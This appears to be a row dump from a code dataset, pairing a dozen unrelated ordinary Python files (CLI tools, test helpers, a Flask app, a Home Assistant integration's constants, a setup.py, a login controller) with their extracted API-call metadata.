code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
---|---|---|
from .client import ScreenshotClient
import schedule
import click
from .schedule import run_screenshot_every
@click.command()
@click.option("--xpath", type=click.STRING, required=True, help="The XPATH of the element to be screenshot.")
@click.option("--output-file", type=click.STRING, required=True, help="The path of the output screenshot.")
@click.option("--url", type=click.STRING, required=True, help="The URL of the page you want to shoot.")
@click.option("--driver-dir", type=click.STRING, required=False, default="Directory where the driver binary is located (or is to be downloaded).")
@click.option("--every", type=click.STRING, required=False, help="Period of time between updates (in minutes or hours")
def main(**kwargs):
run_screenshot_every(
kwargs.get("every"),
kwargs.get("url"),
xpath=kwargs.get("xpath"),
driver_dir=kwargs.get("driver_dir")
)
if __name__ == "__main__":
main()
|
[
"click.option",
"click.command"
] |
[((113, 128), 'click.command', 'click.command', ([], {}), '()\n', (126, 128), False, 'import click\n'), ((130, 243), 'click.option', 'click.option', (['"""--xpath"""'], {'type': 'click.STRING', 'required': '(True)', 'help': '"""The XPATH of the element to be screenshot."""'}), "('--xpath', type=click.STRING, required=True, help=\n 'The XPATH of the element to be screenshot.')\n", (142, 243), False, 'import click\n'), ((240, 351), 'click.option', 'click.option', (['"""--output-file"""'], {'type': 'click.STRING', 'required': '(True)', 'help': '"""The path of the output screenshot."""'}), "('--output-file', type=click.STRING, required=True, help=\n 'The path of the output screenshot.')\n", (252, 351), False, 'import click\n'), ((348, 455), 'click.option', 'click.option', (['"""--url"""'], {'type': 'click.STRING', 'required': '(True)', 'help': '"""The URL of the page you want to shoot."""'}), "('--url', type=click.STRING, required=True, help=\n 'The URL of the page you want to shoot.')\n", (360, 455), False, 'import click\n'), ((452, 602), 'click.option', 'click.option', (['"""--driver-dir"""'], {'type': 'click.STRING', 'required': '(False)', 'default': '"""Directory where the driver binary is located (or is to be downloaded)."""'}), "('--driver-dir', type=click.STRING, required=False, default=\n 'Directory where the driver binary is located (or is to be downloaded).')\n", (464, 602), False, 'import click\n'), ((599, 722), 'click.option', 'click.option', (['"""--every"""'], {'type': 'click.STRING', 'required': '(False)', 'help': '"""Period of time between updates (in minutes or hours"""'}), "('--every', type=click.STRING, required=False, help=\n 'Period of time between updates (in minutes or hours')\n", (611, 722), False, 'import click\n')]
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2017-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Pytest helpers."""
from __future__ import absolute_import, print_function
import os
import shutil
import tempfile
def make_fake_template(content=""):
"""Create fake template for testing.
:param content: File content.
:returns: The temprorary directory.
"""
temp_dir = tempfile.mkdtemp()
invenio_theme_dir = os.path.join(temp_dir, 'invenio_theme')
os.mkdir(invenio_theme_dir)
fake_file = open(os.path.join(invenio_theme_dir, 'fake.html'), 'w+')
fake_file.write(content)
fake_file.close()
return temp_dir
|
[
"os.mkdir",
"tempfile.mkdtemp",
"os.path.join"
] |
[((532, 550), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (548, 550), False, 'import tempfile\n'), ((575, 614), 'os.path.join', 'os.path.join', (['temp_dir', '"""invenio_theme"""'], {}), "(temp_dir, 'invenio_theme')\n", (587, 614), False, 'import os\n'), ((619, 646), 'os.mkdir', 'os.mkdir', (['invenio_theme_dir'], {}), '(invenio_theme_dir)\n', (627, 646), False, 'import os\n'), ((668, 712), 'os.path.join', 'os.path.join', (['invenio_theme_dir', '"""fake.html"""'], {}), "(invenio_theme_dir, 'fake.html')\n", (680, 712), False, 'import os\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import devspace
from devspace.commands import DevSpaceCommand
from devspace.exceptions import UsageError
from devspace.utils.misc import walk_modules
from devspace.servers import DevSpaceServer
import inspect
def _get_server_from_module(module_name, server_name, project_setting):
for module in walk_modules(module_name):
for obj in vars(module).values():
if inspect.isclass(obj) and \
issubclass(obj, DevSpaceServer) and \
obj.__module__ == module.__name__ and \
not obj == DevSpaceServer and \
server_name == obj.type:
return obj(project_setting)
class Command(DevSpaceCommand):
requires_project = True
def syntax(self):
return "[Options]"
def short_desc(self):
return "Render servers"
def add_options(self, parser):
DevSpaceCommand.add_options(self, parser)
parser.add_option("--all", dest="render_all", action="store_true",
help="Render all servers")
parser.add_option("--server", dest="server_name",
help="Render server by its name")
parser.add_option("--host", dest="host", action="store_true",
help="Render project file host ip")
def run(self, args, opts):
if len(args) > 0:
raise UsageError()
if opts.render_all:
print("render all server")
return
if opts.host:
return
print("render_server")
# print(self.settings.attributes)
server_name = opts.server_name
servers = self.settings.get("servers")
if not servers or server_name not in servers.keys():
print("No servers found please check your project configuration file")
self.exitcode = 1
return
server = _get_server_from_module('devspace.servers', server_name, self.settings)
server.render()
server.update_docker_compose()
@property
def templates_dir(self):
return self.settings['TEMPLATES_DIR'] or \
os.path.join(devspace.__path__[0], 'templates')
|
[
"devspace.utils.misc.walk_modules",
"inspect.isclass",
"devspace.exceptions.UsageError",
"devspace.commands.DevSpaceCommand.add_options",
"os.path.join"
] |
[((359, 384), 'devspace.utils.misc.walk_modules', 'walk_modules', (['module_name'], {}), '(module_name)\n', (371, 384), False, 'from devspace.utils.misc import walk_modules\n'), ((945, 986), 'devspace.commands.DevSpaceCommand.add_options', 'DevSpaceCommand.add_options', (['self', 'parser'], {}), '(self, parser)\n', (972, 986), False, 'from devspace.commands import DevSpaceCommand\n'), ((1441, 1453), 'devspace.exceptions.UsageError', 'UsageError', ([], {}), '()\n', (1451, 1453), False, 'from devspace.exceptions import UsageError\n'), ((2199, 2246), 'os.path.join', 'os.path.join', (['devspace.__path__[0]', '"""templates"""'], {}), "(devspace.__path__[0], 'templates')\n", (2211, 2246), False, 'import os\n'), ((443, 463), 'inspect.isclass', 'inspect.isclass', (['obj'], {}), '(obj)\n', (458, 463), False, 'import inspect\n')]
|
import os
import json
from pathlib import Path
from jinja2 import Environment, FileSystemLoader
from aids.app.settings import BASE_DIR
class toHtml:
def __init__(self):
self.env = Environment(loader=FileSystemLoader(BASE_DIR / 'templates'))
self.out_path = Path().cwd()
self.scen_out_file = 'scenario.json'
self.story_out_file = 'story.json'
def new_dir(self, folder):
if folder:
try:
os.mkdir(self.out_path / folder)
except FileExistsError:
pass
with open(BASE_DIR / 'static/style.css', 'r') as file:
style = file.read()
with open(self.out_path / f'{folder}/style.css', 'w') as file:
file.write(style)
def story_to_html(self, infile: str=None):
infile = infile or self.out_path / self.story_out_file
self.new_dir('stories')
with open(infile) as file:
stories = json.load(file)
story_templ = self.env.get_template('story.html')
story_number = {}
for story in reversed(stories):
if story['title']:
story['title'] = story['title'].replace('/', '-')
try:
story_number[story["title"]]
except KeyError:
# new story
story_number = {story["title"]: ""}
if not os.path.exists(
self.out_path /
f'stories/{story["title"]}{story_number[story["title"]]}.html'
):
htmlfile = open(self.out_path / f'stories/{story["title"]}.html', 'w')
else:
# story from same scenario
if story_number[story["title"]]:
story_number[story["title"]] += 1
htmlfile = open(
self.out_path /
f'stories/{story["title"]}{story_number[story["title"]]}.html',
'w'
)
else:
story_number[story["title"]] = 2
htmlfile = open(
self.out_path /
f'stories/{story["title"]}{story_number[story["title"]]}.html',
'w'
)
htmlfile.write(
story_templ.render({
'story': story,
'story_number': story_number
})
)
htmlfile.close()
index = self.env.get_template('index.html')
with open(self.out_path / 'story_index.html', 'w') as outfile:
outfile.write(
index.render(
{'objects': stories, 'content_type': 'stories'
})
)
print('Stories successfully formatted')
def scenario_to_html(self, infile: str=None):
infile = infile or self.out_path / self.scen_out_file
self.new_dir('scenarios')
with open(infile) as file:
scenarios = json.load(file)
subscen_paths = {}
parent_scen = []
for scenario in reversed(scenarios):
scenario['title'] = scenario['title'].replace('/', '-')
if 'isOption' not in scenario or not scenario['isOption']:
# base scenario, initializing the path
scenario['path'] = 'scenarios/'
with open(
self.out_path /
f'{scenario["path"] + scenario["title"]}.html',
'w'
) as file:
scen_templ = self.env.get_template('scenario.html')
file.write(
scen_templ.render({
'scenario': scenario,
'content_type': 'scenario'
})
)
parent_scen.append(scenario)
else:
scenario['path'] = subscen_paths[scenario['title']]
with open(
self.out_path /
f'{scenario["path"]}/{scenario["title"]}.html',
'w'
) as file:
scen_templ = self.env.get_template('scenario.html')
file.write(
scen_templ.render({
'scenario': scenario,
'content_type': 'scenario'
})
)
if "options" in scenario and any(scenario['options']):
for subscen in scenario['options']:
if subscen and "title" in subscen:
subscen['title'] = subscen['title'].replace('/', '-')
subscen['path'] = f'{scenario["path"]}{scenario["title"]}'
subscen_paths[subscen['title']] = subscen['path'] + '/'
self.new_dir(subscen['path'])
index = self.env.get_template('index.html')
with open(self.out_path / 'scen_index.html', 'w') as outfile:
outfile.write(
index.render(
{'objects': parent_scen, 'content_type': 'scenarios'
})
)
print('Scenarios successfully formatted')
|
[
"os.mkdir",
"json.load",
"os.path.exists",
"jinja2.FileSystemLoader",
"pathlib.Path"
] |
[((985, 1000), 'json.load', 'json.load', (['file'], {}), '(file)\n', (994, 1000), False, 'import json\n'), ((3110, 3125), 'json.load', 'json.load', (['file'], {}), '(file)\n', (3119, 3125), False, 'import json\n'), ((224, 264), 'jinja2.FileSystemLoader', 'FileSystemLoader', (["(BASE_DIR / 'templates')"], {}), "(BASE_DIR / 'templates')\n", (240, 264), False, 'from jinja2 import Environment, FileSystemLoader\n'), ((293, 299), 'pathlib.Path', 'Path', ([], {}), '()\n', (297, 299), False, 'from pathlib import Path\n'), ((485, 517), 'os.mkdir', 'os.mkdir', (['(self.out_path / folder)'], {}), '(self.out_path / folder)\n', (493, 517), False, 'import os\n'), ((1425, 1523), 'os.path.exists', 'os.path.exists', (['(self.out_path / f"stories/{story[\'title\']}{story_number[story[\'title\']]}.html"\n )'], {}), '(self.out_path /\n f"stories/{story[\'title\']}{story_number[story[\'title\']]}.html")\n', (1439, 1523), False, 'import os\n')]
|
import os
def get_full_path(path, file=__file__):
dir_path = os.path.dirname(file)
return os.path.join(dir_path, path)
|
[
"os.path.dirname",
"os.path.join"
] |
[((67, 88), 'os.path.dirname', 'os.path.dirname', (['file'], {}), '(file)\n', (82, 88), False, 'import os\n'), ((100, 128), 'os.path.join', 'os.path.join', (['dir_path', 'path'], {}), '(dir_path, path)\n', (112, 128), False, 'import os\n')]
|
from aiokraken.model.tests.strats.st_asset import AssetStrategy
from aiokraken.rest.assets import Assets
import hypothesis.strategies as st
@st.composite
def st_assets(draw):
apl = draw(st.lists(elements=AssetStrategy(), max_size=5, unique_by=lambda x: x.restname))
return Assets(assets_as_dict={ap.restname: ap for ap in apl})
if __name__ == '__main__':
for n in range(1, 10):
print(repr(st_assets().example()))
|
[
"aiokraken.rest.assets.Assets",
"aiokraken.model.tests.strats.st_asset.AssetStrategy"
] |
[((285, 339), 'aiokraken.rest.assets.Assets', 'Assets', ([], {'assets_as_dict': '{ap.restname: ap for ap in apl}'}), '(assets_as_dict={ap.restname: ap for ap in apl})\n', (291, 339), False, 'from aiokraken.rest.assets import Assets\n'), ((212, 227), 'aiokraken.model.tests.strats.st_asset.AssetStrategy', 'AssetStrategy', ([], {}), '()\n', (225, 227), False, 'from aiokraken.model.tests.strats.st_asset import AssetStrategy\n')]
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
HTTP utils
"""
import requests
from ..version import version
DEFAULT_USER_AGENT = 'python-pyvo/{}'.format(version)
def use_session(session):
"""
Return the session passed in, or create a default
session to use for this network request.
"""
if session:
return session
else:
return create_session()
def create_session():
"""
Create a new empty requests session with a pyvo
user agent.
"""
session = requests.Session()
session.headers['User-Agent'] = DEFAULT_USER_AGENT
return session
|
[
"requests.Session"
] |
[((530, 548), 'requests.Session', 'requests.Session', ([], {}), '()\n', (546, 548), False, 'import requests\n')]
|
# Copyright (c) 2015 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_config import cfg
from taskflow.jobs import backends as job_backends
from taskflow.persistence import backends as persistence_backends
from canary.tasks import base
from canary.openstack.common import log
LOG = log.getLogger(__name__)
TASKFLOW_OPTIONS = [
cfg.StrOpt('jobboard_backend_type', default='zookeeper',
help='Default jobboard backend type'),
cfg.StrOpt('persistent_backend_type', default='zookeeper',
help='Default jobboard persistent backend type'),
cfg.ListOpt('jobboard_backend_host', default=['localhost'],
help='Default jobboard backend server host'),
cfg.IntOpt('jobboard_backend_port', default=2181,
help='Default jobboard backend server port (e.g: ampq)'),
cfg.ListOpt('persistent_backend_host', default=['localhost'],
help='Default persistent backend server host'),
cfg.IntOpt('persistent_backend_port', default=2181,
help='Default persistent backend server port (e.g: ampq)'),
cfg.StrOpt('canary_worker_path',
default='/taskflow/jobs/canary_jobs',
help='Default Zookeeper path for canary jobs'),
cfg.StrOpt('canary_worker_jobboard',
default='canary_jobs',
help='Default jobboard name associated with canary worker jobs'),
]
TASKFLOW_GROUP = 'tasks:taskflow'
class TaskFlowDistributedTaskDriver(base.Driver):
"""TaskFlow distributed task Driver."""
def __init__(self, conf):
super(TaskFlowDistributedTaskDriver, self).__init__(conf)
conf.register_opts(TASKFLOW_OPTIONS, group=TASKFLOW_GROUP)
self.distributed_task_conf = conf[TASKFLOW_GROUP]
job_backends_hosts = ','.join(['%s:%s' % (
host, self.distributed_task_conf.jobboard_backend_port)
for host in
self.distributed_task_conf.jobboard_backend_host])
self.jobboard_backend_conf_worker = {
# This topic could become more complicated
"board": self.distributed_task_conf.jobboard_backend_type,
"hosts": job_backends_hosts,
"path": self.distributed_task_conf.canary_worker_path,
}
persistence_backends_hosts = ','.join(['%s:%s' % (
host, self.distributed_task_conf.jobboard_backend_port)
for host in
self.distributed_task_conf.jobboard_backend_host])
self.persistence_backend_conf = {
# This topic could become more complicated
"connection": self.distributed_task_conf.persistent_backend_type,
"hosts": persistence_backends_hosts,
}
def is_alive(self):
"""Health check for TaskFlow worker."""
return True
def persistence(self):
return persistence_backends.backend(
self.persistence_backend_conf.copy())
def job_board(self, conf, persistence, **kwargs):
return job_backends.backend(
self.distributed_task_conf.canary_worker_jobboard,
conf.copy(), persistence=persistence)
@property
def vendor_name(self):
"""storage name.
:returns 'TaskFlow'
"""
return 'TaskFlow'
|
[
"oslo_config.cfg.StrOpt",
"oslo_config.cfg.IntOpt",
"canary.openstack.common.log.getLogger",
"oslo_config.cfg.ListOpt"
] |
[((808, 831), 'canary.openstack.common.log.getLogger', 'log.getLogger', (['__name__'], {}), '(__name__)\n', (821, 831), False, 'from canary.openstack.common import log\n'), ((858, 957), 'oslo_config.cfg.StrOpt', 'cfg.StrOpt', (['"""jobboard_backend_type"""'], {'default': '"""zookeeper"""', 'help': '"""Default jobboard backend type"""'}), "('jobboard_backend_type', default='zookeeper', help=\n 'Default jobboard backend type')\n", (868, 957), False, 'from oslo_config import cfg\n'), ((973, 1085), 'oslo_config.cfg.StrOpt', 'cfg.StrOpt', (['"""persistent_backend_type"""'], {'default': '"""zookeeper"""', 'help': '"""Default jobboard persistent backend type"""'}), "('persistent_backend_type', default='zookeeper', help=\n 'Default jobboard persistent backend type')\n", (983, 1085), False, 'from oslo_config import cfg\n'), ((1101, 1210), 'oslo_config.cfg.ListOpt', 'cfg.ListOpt', (['"""jobboard_backend_host"""'], {'default': "['localhost']", 'help': '"""Default jobboard backend server host"""'}), "('jobboard_backend_host', default=['localhost'], help=\n 'Default jobboard backend server host')\n", (1112, 1210), False, 'from oslo_config import cfg\n'), ((1227, 1338), 'oslo_config.cfg.IntOpt', 'cfg.IntOpt', (['"""jobboard_backend_port"""'], {'default': '(2181)', 'help': '"""Default jobboard backend server port (e.g: ampq)"""'}), "('jobboard_backend_port', default=2181, help=\n 'Default jobboard backend server port (e.g: ampq)')\n", (1237, 1338), False, 'from oslo_config import cfg\n'), ((1354, 1467), 'oslo_config.cfg.ListOpt', 'cfg.ListOpt', (['"""persistent_backend_host"""'], {'default': "['localhost']", 'help': '"""Default persistent backend server host"""'}), "('persistent_backend_host', default=['localhost'], help=\n 'Default persistent backend server host')\n", (1365, 1467), False, 'from oslo_config import cfg\n'), ((1484, 1599), 'oslo_config.cfg.IntOpt', 'cfg.IntOpt', (['"""persistent_backend_port"""'], {'default': '(2181)', 'help': '"""Default persistent backend server port (e.g: ampq)"""'}), "('persistent_backend_port', default=2181, help=\n 'Default persistent backend server port (e.g: ampq)')\n", (1494, 1599), False, 'from oslo_config import cfg\n'), ((1615, 1737), 'oslo_config.cfg.StrOpt', 'cfg.StrOpt', (['"""canary_worker_path"""'], {'default': '"""/taskflow/jobs/canary_jobs"""', 'help': '"""Default Zookeeper path for canary jobs"""'}), "('canary_worker_path', default='/taskflow/jobs/canary_jobs', help\n ='Default Zookeeper path for canary jobs')\n", (1625, 1737), False, 'from oslo_config import cfg\n'), ((1768, 1897), 'oslo_config.cfg.StrOpt', 'cfg.StrOpt', (['"""canary_worker_jobboard"""'], {'default': '"""canary_jobs"""', 'help': '"""Default jobboard name associated with canary worker jobs"""'}), "('canary_worker_jobboard', default='canary_jobs', help=\n 'Default jobboard name associated with canary worker jobs')\n", (1778, 1897), False, 'from oslo_config import cfg\n')]
|
from flask import Flask, render_template, flash, request
from flask_bootstrap import Bootstrap
from flask_wtf import FlaskForm
from wtforms import SubmitField
from wtforms.fields.html5 import URLField, IntegerField
from wtforms.validators import DataRequired, Optional
from wtforms.widgets import html5 as h5widgets
from utils import fetch, get_query_url
app = Flask(__name__)
# Flask-WTF requires an encryption key - the string can be anything
app.config['SECRET_KEY'] = '<KEY>'
# Flask-Bootstrap requires this line
Bootstrap(app)
DEFAULT_MAX_PAGE = 10
@app.route('/', methods=['GET', 'POST'])
def home():
header = "Summarize WordPress Blog"
form = NameForm()
site_url = request.args.get('url')
base_url = request.base_url
if request.method == 'GET' and site_url != None:
number_of_pages = request.args.get('pages')
if number_of_pages != None:
try:
number_of_pages = int(number_of_pages)
except:
number_of_pages = 1
form.number_of_pages.data = number_of_pages
form.name.data = site_url
lines = fetch(site_url, number_of_pages)
query_url = get_query_url(base_url, site_url, number_of_pages)
return render_template('search.html', pairs=lines, the_title=header, form=form, query_url=query_url)
elif request.method == 'POST' and form.validate_on_submit():
site_url = form.name.data
number_of_pages = form.number_of_pages.data
if number_of_pages is None:
number_of_pages = DEFAULT_MAX_PAGE
lines = fetch(site_url, number_of_pages)
query_url = get_query_url(base_url, site_url, number_of_pages)
return render_template('search.html', pairs=lines, the_title=header, form=form, query_url=query_url)
return render_template('search.html', the_title=header, form=form)
class NameForm(FlaskForm):
name = URLField('Enter a url for wordpress blog',
validators=[DataRequired()], description="e.g. https://www.xyz.com/articles or https://www.xyz.com/blogs")
number_of_pages = IntegerField('Enter number of pages you want to see',
widget=h5widgets.NumberInput(
min=1, max=100),
validators=[Optional()])
submit = SubmitField('Submit')
if __name__ == '__main__':
app.run()
|
[
"utils.fetch",
"flask.request.args.get",
"wtforms.widgets.html5.NumberInput",
"flask.Flask",
"wtforms.SubmitField",
"wtforms.validators.Optional",
"flask.render_template",
"utils.get_query_url",
"flask_bootstrap.Bootstrap",
"wtforms.validators.DataRequired"
] |
[((362, 377), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (367, 377), False, 'from flask import Flask, render_template, flash, request\n'), ((519, 533), 'flask_bootstrap.Bootstrap', 'Bootstrap', (['app'], {}), '(app)\n', (528, 533), False, 'from flask_bootstrap import Bootstrap\n'), ((688, 711), 'flask.request.args.get', 'request.args.get', (['"""url"""'], {}), "('url')\n", (704, 711), False, 'from flask import Flask, render_template, flash, request\n'), ((1809, 1868), 'flask.render_template', 'render_template', (['"""search.html"""'], {'the_title': 'header', 'form': 'form'}), "('search.html', the_title=header, form=form)\n", (1824, 1868), False, 'from flask import Flask, render_template, flash, request\n'), ((2350, 2371), 'wtforms.SubmitField', 'SubmitField', (['"""Submit"""'], {}), "('Submit')\n", (2361, 2371), False, 'from wtforms import SubmitField\n'), ((824, 849), 'flask.request.args.get', 'request.args.get', (['"""pages"""'], {}), "('pages')\n", (840, 849), False, 'from flask import Flask, render_template, flash, request\n'), ((1120, 1152), 'utils.fetch', 'fetch', (['site_url', 'number_of_pages'], {}), '(site_url, number_of_pages)\n', (1125, 1152), False, 'from utils import fetch, get_query_url\n'), ((1173, 1223), 'utils.get_query_url', 'get_query_url', (['base_url', 'site_url', 'number_of_pages'], {}), '(base_url, site_url, number_of_pages)\n', (1186, 1223), False, 'from utils import fetch, get_query_url\n'), ((1239, 1336), 'flask.render_template', 'render_template', (['"""search.html"""'], {'pairs': 'lines', 'the_title': 'header', 'form': 'form', 'query_url': 'query_url'}), "('search.html', pairs=lines, the_title=header, form=form,\n query_url=query_url)\n", (1254, 1336), False, 'from flask import Flask, render_template, flash, request\n'), ((1584, 1616), 'utils.fetch', 'fetch', (['site_url', 'number_of_pages'], {}), '(site_url, number_of_pages)\n', (1589, 1616), False, 'from utils import fetch, get_query_url\n'), ((1637, 1687), 'utils.get_query_url', 'get_query_url', (['base_url', 'site_url', 'number_of_pages'], {}), '(base_url, site_url, number_of_pages)\n', (1650, 1687), False, 'from utils import fetch, get_query_url\n'), ((1703, 1800), 'flask.render_template', 'render_template', (['"""search.html"""'], {'pairs': 'lines', 'the_title': 'header', 'form': 'form', 'query_url': 'query_url'}), "('search.html', pairs=lines, the_title=header, form=form,\n query_url=query_url)\n", (1718, 1800), False, 'from flask import Flask, render_template, flash, request\n'), ((2197, 2234), 'wtforms.widgets.html5.NumberInput', 'h5widgets.NumberInput', ([], {'min': '(1)', 'max': '(100)'}), '(min=1, max=100)\n', (2218, 2234), True, 'from wtforms.widgets import html5 as h5widgets\n'), ((1984, 1998), 'wtforms.validators.DataRequired', 'DataRequired', ([], {}), '()\n', (1996, 1998), False, 'from wtforms.validators import DataRequired, Optional\n'), ((2323, 2333), 'wtforms.validators.Optional', 'Optional', ([], {}), '()\n', (2331, 2333), False, 'from wtforms.validators import DataRequired, Optional\n')]
|
import pytest
from inutils import chunkify
@pytest.mark.parametrize(
"iterable, expected",
(
([1], [[1]]),
([1, 2], [[1, 2]]),
([1, 2, 3], [[1, 2], [3]]),
([1, 2, 3, 4, 5], [[1, 2], [3, 4], [5]]),
(range(1, 7), [[1, 2], [3, 4], [5, 6]]),
),
)
def test_chunkify_size_2(iterable, expected):
assert list(chunkify(iterable, chunk_size=2)) == expected
@pytest.mark.parametrize(
"iterable, expected",
(
([1, 2], [[1, 2]]),
([1, 2, 3], [[1, 2, 3]]),
([1, 2, 3, 4, 5], [[1, 2, 3], [4, 5]]),
(range(1, 7), [[1, 2, 3], [4, 5, 6]]),
([1, 2, 3, 4, 5, 6, 7], [[1, 2, 3], [4, 5, 6], [7]]),
),
)
def test_chunkify_size_3(iterable, expected):
assert list(chunkify(iterable, chunk_size=3)) == expected
|
[
"inutils.chunkify"
] |
[((360, 392), 'inutils.chunkify', 'chunkify', (['iterable'], {'chunk_size': '(2)'}), '(iterable, chunk_size=2)\n', (368, 392), False, 'from inutils import chunkify\n'), ((756, 788), 'inutils.chunkify', 'chunkify', (['iterable'], {'chunk_size': '(3)'}), '(iterable, chunk_size=3)\n', (764, 788), False, 'from inutils import chunkify\n')]
|
"""pyspikelib: A set of tools for neuronal spiking data mining"""
import os
import re
import codecs
import setuptools
here = os.path.abspath(os.path.dirname(__file__))
with open('README.md', 'r') as fh:
LONG_DESCRIPTION = fh.read()
def read(*parts):
with codecs.open(os.path.join(here, *parts), 'r') as fp:
return fp.read()
def find_version(*file_paths):
version_file = read(*file_paths)
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]", version_file, re.M)
if version_match:
return version_match.group(1)
raise RuntimeError('Unable to find version string.')
DISTNAME = 'pyspikelib'
DESCRIPTION = 'pyspikelib: A set of tools for neuronal spiking data mining'
MAINTAINER = '<NAME>'
MAINTAINER_EMAIL = '<EMAIL>'
URL = 'https://github.com/vanyalzr/pyspikelib'
DOWNLOAD_URL = 'https://github.com/vanyalzr/pyspikelib'
VERSION = find_version(os.path.join(here, 'pyspikelib/version.py'))
LONG_DESCRIPTION_CONTENT_TYPE = 'text/markdown'
INSTALL_REQUIRES = [
'addict',
'pathos',
'quantities',
'neo',
'matplotlib',
'numpy',
'seaborn',
'tqdm',
'pandas',
'elephant',
'tsfresh',
'scikit_learn',
'psutil'
]
EXTRAS_REQUIRE = {'tests': ['pytest'], 'data': ['fastparquet']}
setuptools.setup(
name=DISTNAME,
version=VERSION,
author=MAINTAINER,
author_email=MAINTAINER_EMAIL,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type=LONG_DESCRIPTION_CONTENT_TYPE,
url=URL,
download_url=DOWNLOAD_URL,
packages=setuptools.find_packages(exclude=['data', 'examples', 'experiments']),
classifiers=[
'Programming Language :: Python :: 3',
'Operating System :: OS Independent',
],
install_requires=INSTALL_REQUIRES,
extras_require=EXTRAS_REQUIRE,
)
|
[
"os.path.dirname",
"re.search",
"os.path.join",
"setuptools.find_packages"
] |
[((143, 168), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (158, 168), False, 'import os\n'), ((435, 508), 're.search', 're.search', (['"""^__version__ = [\'\\\\"]([^\'\\\\"]*)[\'\\\\"]"""', 'version_file', 're.M'], {}), '(\'^__version__ = [\\\'\\\\"]([^\\\'\\\\"]*)[\\\'\\\\"]\', version_file, re.M)\n', (444, 508), False, 'import re\n'), ((900, 943), 'os.path.join', 'os.path.join', (['here', '"""pyspikelib/version.py"""'], {}), "(here, 'pyspikelib/version.py')\n", (912, 943), False, 'import os\n'), ((1583, 1652), 'setuptools.find_packages', 'setuptools.find_packages', ([], {'exclude': "['data', 'examples', 'experiments']"}), "(exclude=['data', 'examples', 'experiments'])\n", (1607, 1652), False, 'import setuptools\n'), ((280, 306), 'os.path.join', 'os.path.join', (['here', '*parts'], {}), '(here, *parts)\n', (292, 306), False, 'import os\n')]
|
import logging
from datetime import timedelta
API = "api"
NAME = "afvalwijzer"
VERSION = "2021.05.01"
ISSUE_URL = "https://github.com/xirixiz/homeassistant-afvalwijzer/issues"
SENSOR_PROVIDER_TO_URL = {
"afvalwijzer_data_default": [
"https://api.{0}.nl/webservices/appsinput/?apikey=5ef443e778f41c4f75c69459eea6e6ae0c2d92de729aa0fc61653815fbd6a8ca&method=postcodecheck&postcode={1}&street=&huisnummer={2}&toevoeging={3}&app_name=afvalwijzer&platform=phone&afvaldata={4}&langs=nl&"
],
}
CONF_PROVIDER = "provider"
CONF_API_TOKEN = "<PASSWORD>_token"
# <KEY>
CONF_POSTAL_CODE = "postal_code"
CONF_STREET_NUMBER = "street_number"
CONF_SUFFIX = "suffix"
CONF_DATE_FORMAT = "date_format"
CONF_INCLUDE_DATE_TODAY = "include_date_today"
CONF_DEFAULT_LABEL = "default_label"
CONF_ID = "id"
CONF_EXCLUDE_LIST = "exclude_list"
SENSOR_PREFIX = "afvalwijzer "
SENSOR_ICON = "mdi:recycle"
ATTR_LAST_UPDATE = "last_update"
ATTR_IS_COLLECTION_DATE_TODAY = "is_collection_date_today"
ATTR_IS_COLLECTION_DATE_TOMORROW = "is_collection_date_tomorrow"
ATTR_IS_COLLECTION_DATE_DAY_AFTER_TOMORROW = "is_collection_date_day_after_tomorrow"
ATTR_DAYS_UNTIL_COLLECTION_DATE = "days_until_collection_date"
ATTR_YEAR_MONTH_DAY_DATE = "year_month_day_date"
_LOGGER = logging.getLogger(__name__)
MIN_TIME_BETWEEN_UPDATES = timedelta(hours=1)
PARALLEL_UPDATES = 1
SCAN_INTERVAL = timedelta(seconds=30)
DOMAIN = "afvalwijzer"
DOMAIN_DATA = "afvalwijzer_data"
STARTUP_MESSAGE = f"""
-------------------------------------------------------------------
Afvalwijzer
This is a custom integration!
If you have any issues with this you need to open an issue here:
https://github.com/xirixiz/homeassistant-afvalwijzer/issues
-------------------------------------------------------------------
"""
|
[
"datetime.timedelta",
"logging.getLogger"
] |
[((1262, 1289), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1279, 1289), False, 'import logging\n'), ((1318, 1336), 'datetime.timedelta', 'timedelta', ([], {'hours': '(1)'}), '(hours=1)\n', (1327, 1336), False, 'from datetime import timedelta\n'), ((1374, 1395), 'datetime.timedelta', 'timedelta', ([], {'seconds': '(30)'}), '(seconds=30)\n', (1383, 1395), False, 'from datetime import timedelta\n')]
|
import copy
import requests
class AuthController:
_REQ_HEADERS = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36",
"Connection": "keep-alive",
"Cache-Control": "max-age=0",
"sec-ch-ua": '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"',
"sec-ch-ua-mobile": "?0",
"Upgrade-Insecure-Requests": "1",
"Origin": "https://dhlottery.co.kr",
"Content-Type": "application/x-www-form-urlencoded",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": "https://dhlottery.co.kr/",
"Sec-Fetch-Site": "same-site",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-User": "?1",
"Sec-Fetch-Dest": "document",
"Accept-Language": "ko,en-US;q=0.9,en;q=0.8,ko-KR;q=0.7",
}
_AUTH_CRED = ""
def login(self, user_id: str, password: str):
assert type(user_id) == str
